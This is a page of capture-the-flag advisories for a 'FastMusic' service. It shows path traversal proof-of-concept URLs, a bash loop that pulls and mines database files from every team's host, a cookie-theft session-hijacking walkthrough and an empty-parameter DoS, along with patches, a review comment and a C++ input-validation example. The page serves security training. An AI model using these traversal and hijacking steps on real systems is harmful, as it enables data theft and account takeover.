FastMusic Advisories


Service:FastMusic
Text:The FastMusic service has an arbitrary file download vulnerability.

poc: http://10.23.x.3:82/music?action=get&name=../databases/__db.001

solution: filter slash symbols /, \
Jury comment:Give some exploit
Score:2/5 points

Service:FastMusic
Text:Vulnerability:
Directory Traversal

Exploit:
http://10.23.X.3:82/music?action=get&name=../databases/fastmusic.db
Jury comment:Too late
Score:0/5 points

Service:FastMusic
Text:Description:
Class: Arbitrary file read
Vulnerable
The fastmusic service has an arbitrary file read vulnerability via the
name parameter of the get action on /music:

Exploit:
http://10.23.$i.3:82/music?action=get&name=../databases/playlists_fastmusic.db

Patch:
Add the following block to the nginx service configuration
(sites-enabled/fastmusic) in the location block

if ($request_uri ~* "name=.*\.\..*") {
return 403;
}
Jury comment:Too late
Score:0/5 points

Service:FastMusic
Text:The service stores the flags in 2 databases.
databases/fastmusic.db
databases/playlists_fastmusic.db


You can get flags from all teams with this exploit:


#!/bin/bash

for i in `seq -w 1 99`;
do
wget -q -O - --timeout=15 "http://10.23.${i}.3:82/music?action=get&name=../databases/fastmusic.db" > db-fastmusic.$i &
wget -q -O - --timeout=15 "http://10.23.${i}.3:82/music?action=get&name=../databases/playlists_fastmusic.db" > db-playlist.$i &
done

wait

rm db-fastmusic.45 db-playlist.45

for i in `seq -w 1 99`;
do
sqlite3 db-fastmusic.$i .dump | egrep -o '\w{31}=' | sort -u > flags-fastmusic.$i
sqlite3 db-playlist.$i .dump | egrep -o '\w{31}=' | sort -u > flags-playlist.$i
done

exit 0;
Jury comment:Too late
Score:0/5 points

Service:FastMusic
Text:Patch for arbitrary read

--- MusicHandler.h 2011-11-12 12:17:52.000000000 -0500
+++ MusicHandler.h.new 2011-11-19 16:29:12.011614372 -0500
@@ -43,6 +43,7 @@
{
std::string name = params.GetGetParam("name");
headers << "Content-type: audio/mpeg\r\n";
+ boost::replace_all(name, "..", "");
out << TemplateReader::ReadFile("music_files/" + name);
} else if (action == "users")
{
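Review bot: the added `boost::replace_all(name, "..", "")` only deletes ".." and leaves the empty-name case untouched: with `name=""` the next line still calls `TemplateReader::ReadFile("music_files/" + name)`, i.e. reads "music_files/", which is exactly the DoS reported in the last advisory on this page. Suggest rejecting the request (empty name, or a name containing ".." or a path separator) with an error response instead of silently rewriting the string and serving whatever is left. Also, the header that declares `boost::replace_all` (`boost/algorithm/string/replace.hpp`) does not appear in the hunk; confirm MusicHandler.h already includes it, otherwise the patched file will not compile.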
Jury comment:
Score:3/5 points

Service:FastMusic
Text:Vulnerability:
Session Hijacking

Description:
Session hijacking vulnerability in FastMusic lets one user log in as another just by changing the cookie contents in the browser. Although this could be done with a man-in-the-middle attack, because the database_cookie.db can be browsed to and downloaded, all sessions can be gleaned and we can log in as any user.

Method of attack:
1. Browse to http://10.23.X.3:82/music?action=get&name=../databases/cookie_fastmusic.db
2. Download the file
3. Open the file (I used vim) and find the user that you wish to log in as. Copy the long string of characters that comes after the ^@^@^@A^@^A and ^@^O^@^A for the cookie.

For example, if you want to log in using the following user:
cizw-bir4-dlzr
then look in this string:
^@^O^@^Acizw-bir4-dlzr^@^@^@A^@^Ajeqwmuqszhhmhbfpcciswcwrniwopuqazizncpgdynriqwxuahmwlipysmpkifmj^@^O^@^A

copy jeqwmuqszhhmhbfpcciswcwrniwopuqazizncpgdynriqwxuahmwlipysmpkifmj

and either:
copy it into the cookie field while you replay the packets or
you could use cookie editor in firefox to login as that user.

Mitigation:
Set a regex that checks for anything except '-', letters and numbers, e.g.
Jury comment:Too late
Score:0/5 points


Service:FastMusic
Text:FastMusic DoS vuln

POC: http://10.23.*.3:82/music?action=get&name=

solution: check name parameter for emptiness/invalid value
Jury comment:
Score:4/4 points
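The checks the advisories above propose (filter slashes, reject "..", reject an empty name, and accept nothing but letters, digits and '-' in the session cookie) written out as one added example in C++ using only the standard library. This is not the FastMusic service's code: the function names are assumptions, and strip_dotdot is a standard-library stand-in for the submitted boost::replace_all patch so that its effect can be compared with rejecting the request outright.

```cpp
#include <regex>
#include <string>

// Allow-list for the "name" parameter of action=get: 1-64 characters from
// [A-Za-z0-9_-], optionally followed by a short extension, nothing else.
// This rejects "/" and "\", "..", percent-encoded forms such as "%2e%2e"
// and the empty string (the empty name is the DoS case reported above).
bool is_safe_music_name(const std::string& name) {
    static const std::regex ok("^[A-Za-z0-9_-]{1,64}(\\.[A-Za-z0-9]{1,8})?$");
    return std::regex_match(name, ok);
}

// Path the handler may read, or "" when the name is rejected. A caller
// that gets "" should answer with an error instead of calling ReadFile.
std::string music_file_path(const std::string& name) {
    if (!is_safe_music_name(name)) return "";
    return "music_files/" + name;
}

// Stand-in for the submitted patch's boost::replace_all(name, "..", ""):
// delete every ".." and return what is left. Kept here only to show that
// stripping silently rewrites the name and serves the remainder, whereas
// is_safe_music_name refuses the request.
std::string strip_dotdot(std::string name) {
    std::string::size_type pos = 0;
    while ((pos = name.find("..", pos)) != std::string::npos)
        name.erase(pos, 2);
    return name;
}

// Syntactic check for the session cookie as the hijacking advisory
// suggests: letters, digits and '-' only, with a length bound. Note that a
// well-formed token copied out of the cookie database still passes; the
// check only drops malformed values, it does not replace fixing the read.
bool is_well_formed_session_token(const std::string& token) {
    static const std::regex ok("^[A-Za-z0-9-]{1,128}$");
    return std::regex_match(token, ok);
}
```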